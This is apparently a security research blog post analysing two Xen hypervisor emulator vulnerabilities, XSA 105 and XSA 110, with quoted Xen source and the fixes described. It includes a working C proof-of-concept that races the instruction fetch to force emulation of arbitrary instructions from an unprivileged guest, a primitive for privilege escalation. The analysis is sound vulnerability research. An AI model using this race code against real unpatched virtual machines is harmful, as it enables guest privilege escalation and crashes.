The Dangers of x86 Emulation: Xen XSA 110 and 105

Felix Wilhelm

Xen Logo

Developing a secure and feature rich hypervisor is no easy task. Recently, the open source Xen hypervisor was affected by two interesting vulnerabilities involving its x86 emulation code: XSA 110 and XSA 105. Both bugs show that the attack surface of hypervisors is often larger than expected. XSA 105 was originally reported by Andrei Lutas from BitDefender. The patch adds missing privilege checks to the emulation routines of several critical system instructions including LGDT and LIDT. The vulnerable code can be reached from unprivileged user code running inside hardware virtual machine (HVM) guests and can be used to escalate guest privileges. XSA 110 was reported by Jan Beulich from SUSE and concerns insufficient checks when emulating long jumps, calls or returns.

Readers interested in virtualization technology might wonder about the existence of an instruction emulator in the HVM hypervisor code: One of the advantages of hardware-assisted virtualization is the ability to execute privileged instructions natively and securely. While this is true in general, emulation is still needed for some special cases:

Instructions accessing memory mapped IO space.
VMs running in real mode: Due to restrictions of earlier Intel VMX versions many popular hypervisors emulate VM code running in real mode.
Support instructions not yet implemented by the physical hardware.

In practice, all mainstream hypervisors include at least basic emulation support with very varying quality.

While memory flaws in the emulator code could allow for a complete hypervisor breakout, logic bugs involving wrongly emulated instructions are much more common. In the worst case, these bugs can result in privilege escalation vulnerabilities inside the guest VM, as it is the case for XSA 105. As mentioned in the advisory, the bug is caused by missing privilege checks for certain special instructions. In order to exploit this bug for privilege escalation, we require a way to emulate arbitrary instructions as a normal user inside a VM.

Emulating Arbitrary Instructions

Fortunately, emulation of arbitrary instructions can be triggered easily on guests with multiple virtual CPUs, as described by Andrej Lutas in his writeup:

First, we raise an #UD exception on one the CPUs by executing an invalid opcode. This will trigger an VM exit, which is handled by the main vm exit handler. For Intel CPUs, this handler is the vmx_vmexit_handler function defined in x86/hvm/vmx/vmx.c:

void vmx_vmexit_handler(struct cpu_user_regs *regs) {
…
switch ( exit_reason ) {
…
case TRAP_invalid_op:
HVMTRACE_1D(TRAP, vector);
vmx_vmexit_ud_intercept(regs);
break;
…
}

While the complete exit handler is quite complex, at its core is just a big switch statement based on the VMX exit reason. In the case of an #UD exception, the vmx_vmxeit_ud_intercept function is called:

static void vmx_vmexit_ud_intercept(struct cpu_user_regs *regs){
struct hvm_emulate_ctxt ctxt;
int rc;
hvm_emulate_prepare(&ctxt, regs);
rc = hvm_emulate_one(&ctxt);
...
}

As we can see, the function is a small wrapper around hvm_emulate_one, which in turn calls into the x86_emulate function defined in x86/x86_emulate/x86_emulate.c for the actual emulation.
One interesting aspect for us is that x86_emulate fetches the actual bytes to be emulated directly from the guest memory. This means, that there exists a race condition from the time when the #UD exception is raised to the point when x86_emulate fetches the instruction bytes. If we use our second virtual CPU to manipulate the originally invalid opcode during this time span, we can force emulation of arbitrary assembly instructions. While winning this race reliably is quite hard, even a small chance to win is sufficient for our use case. The code snippet below shows a minimal sample that will trigger emulation of a far return using this technique:

 
#include <stdlib.h>
#include <pthread.h>
#include <time.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>

// Initialize barrier with 0
long barrier=0;

void *thread_one(void *x) {
    __asm volatile(".intel_syntax noprefix\n"
            ".code64\n"
            // Write UD2 instruction at position of ret
            "mov byte ptr [trigger], 0x0F\n"
            "mov byte ptr [trigger+1], 0x0B\n"
            // Increase barrier
            "lea rax, [barrier]\n"
            "lock inc qword ptr [rax]\n"
            "wait:\n"
            "cmp qword ptr [rax], 2\n"
            // Wait until thread_two arrives at barrier
            "jnz wait\n"
            "trigger:\n"
            // Will be replaced with UD2 by now
            "rex64 retf\n"
            ".att_syntax prefix\n"
            );
}

void *thread_two(void *x) {
    __asm volatile(".intel_syntax noprefix\n"
            ".code64\n"
            "lea rax, [barrier]\n"
            "lock inc qword ptr [rax]\n"
            "wait2:\n"
            "cmp qword ptr [rax], 2\n"
            "jnz wait2\n"
            // Restore far ret instruction
            "mov byte ptr [trigger], 0x48\n"
            "mov byte ptr [trigger+1], 0xCB\n"
            ".att_syntax prefix\n"
            );
}


void doStuff(void)
{
    // Initialize and start both threads.
    pthread_t h1, h2;
    pthread_create(&h1,NULL,thread_one,NULL);
    pthread_create(&h2,NULL,thread_two,NULL);
    pthread_join(h1,0);
    pthread_join(h2,0);
}

int main(int argc, char **argv)
{
    // We have to make the code of thread_one writable in order to enable
    // patching of the instruction. Simply mprotecting the whole page is the
    // easiest way to do this.
    long page_size = sysconf(_SC_PAGESIZE);
    long address = (long) thread_one;
    mprotect(((void *) (address & ~(page_size-1))), page_size, PROT_READ | PROT_WRITE | PROT_EXEC);
    doStuff();
    return 0;
}

Of course without bugs in the emulator code this ability is not very interesting in itself. Besides classic low-level code issues like memory corruptions there are two features of an emulator that can be an interesting source of security vulnerabilities:

Guest Memory Access: Most emulated instructions will access VM memory either directly or indirectly. During normal operation memory access checks are performed automatically by the hardware. However, when emulating all these checks have to be performed by the hypervisor itself. The low level nature of this code, as well as the high complexity of the x86 architecture makes this work quite error prone.
Privileged Instructions: Several x86 instructions should only be called from ring 0. This includes instructions that manipulate control or system registers, instructions that influence segment selector or even simple ones like “HLT” which halts the CPU.

Xen XSA 105

Xen XSA 105 is a quite simple example of the second bug type. When looking at the implementation of the wrmsr instruction inside the Xen emulator, we can see that the instruction will be only be evaluated when the caller is in ring 0:

case 0x30: /* wrmsr */ {
  uint64_t val = ((uint64_t)_regs.edx << 32) |  (uint32_t)_regs.eax;
  generate_exception_if(!mode_ring0(), EXC_GP, 0);
  fail_if(ops->write_msr == NULL);
  if ( (rc = ops->write_msr((uint32_t)_regs.ecx, val, ctxt)) != 0 )
  goto done;
  break;
}

However, this check is missing for several other functions including HLT, LIDT and LGDT.

case 0xf4: /* hlt */
   ctxt->retire.flags.hlt = 1;
   break;
…
case 2: /* lgdt */
case 3: /* lidt */
   generate_exception_if(ea.type != OP_MEM, EXC_UD, -1);
   fail_if(ops->write_segment == NULL);
   memset(&reg, 0, sizeof(reg));
   if ( (rc = read_ulong(ea.mem.seg, ea.mem.off+0, &limit, 2, ctxt, ops)) ||
   (rc = read_ulong(ea.mem.seg, ea.mem.off+2, &base, mode_64bit() ? 8 : 4, ctxt, ops)) )
      goto done; 
   reg.base = base;
   reg.limit = limit;
   if ( op_bytes == 2 )
      reg.base &= 0xffffff;
   if ( (rc = ops->write_segment((modrm_reg & 1) ? x86_seg_idtr : x86_seg_gdtr, &reg, ctxt)) )
      goto done;
   break;

Because LIDT allows the overwriting of the Interrupt Descriptor Table which stores the handler of all hardware and software interrupts, privilege escalation is easily possible. The already mentioned whitepaper describes the exploitation process on Windows in detail.
The patch for XSA 105 is as simple as the bug. Just add ring 0 checks in front of all privileged instructions.

Xen XSA 110

The second recent bug involving the Xen emulator is Xen XSA 110, which was discovered by Jan Beulich from SUSE. X86 supports far branch instructions that support jumping to a new address while simultaneously changing the code segment selector to a new value. In order to understand the underlying details of this vulnerability, a bit of background about the role of segment selectors on modern operating systems is needed:

When we are talking about ring 0 or ring 3 mode, we are actually talking about the “Current Privilege Level” (CPL) of the currently executing code. The CPL is encoded in the lowest bits of the CS segment selector and cannot be changed by normal means. Direct access to the CS register is impossible and instructions that change the value of the CS register take care to ensure that a switch to ring 0 is only possible under special predefined circumstances. Besides being used for enabling and disabling access to privileged instructions, the CPL is used whenever memory is accessed. The “Descriptor Privilege Level” (DPL) of a memory segment that is encoded in the segment descriptor restricts access to code that executes with a CPL smaller or equal to DPL.

The issue patched with XSA 110 is the fact that the actual checks performed by the Xen emulator when changing the value of the CS register are much weaker than they should be. The following code is part of the vulnerable function protmode_load_seg defined in x86/x86_emulate/x86_emulate.c:

    dpl = (desc.b >> 13) & 3;
    rpl = sel & 3;
    cpl = ss.attr.fields.dpl;

    switch ( seg )
    {
    case x86_seg_cs:
        /* Code segment? */
        if ( !(desc.b & (1u<<11)) )
            goto raise_exn;
        /* Non-conforming segment: check DPL against RPL. */
        if ( ((desc.b & (6u<<9)) != (6u<<9)) && (dpl != rpl) )
            goto raise_exn;
        break;

protmode_load_seg is indirectly called by the emulation routines of all far branching instructions (RETF, CALL and JMP). Its purpose is to change the value of a segment selector register after validating the new value. However, in the unpatched version no sufficient checking is performed.
An attacker wanting to escalate privileges on a Linux system would choose the CS register value 0x10, which corresponds to the CS value used by the Linux kernel. In this case the variables rpl and dpl in Listing 6 would be 0, while the current CPL would still be 3. But because the switch for the code segment does not check the current CPL in any way, the instruction would be emulated.
While we originally thought this bug would be sufficient for privilege escalation, this does not seem to be the case due to an interesting and lesser-known property of the Intel x86 architecture. While the current CPL is always stored in the lowest bits of the CS selector, there is a hard requirement that the same value is also stored in the DPL field of the stack segment. Because this requirement is not actually handled by the emulator code, an exploit targeting this vulnerability will result in a crash of the virtual machine. A normal user should not be able to trigger this behavior, but it is a significantly less interesting bug.

Summary

Xen XSA 105 and XSA 110 are two bugs involving the Xen x86 emulation code. They both can be used to crash a virtual machine as an unprivileged user and XSA 105 even allows privilege escalation independent of vulnerabilities in the virtualized operating system. Bugs like this show that hypervisors are often not as hardened as many people assume and the introduction of additional software layers will lead to additional bugs. Full exploit code for Xen XSA 105 will be presented during the Exploiting Hypervisors Workshop at Troopers 15 and will be released publicly sometimes after that.

Felix Wilhelm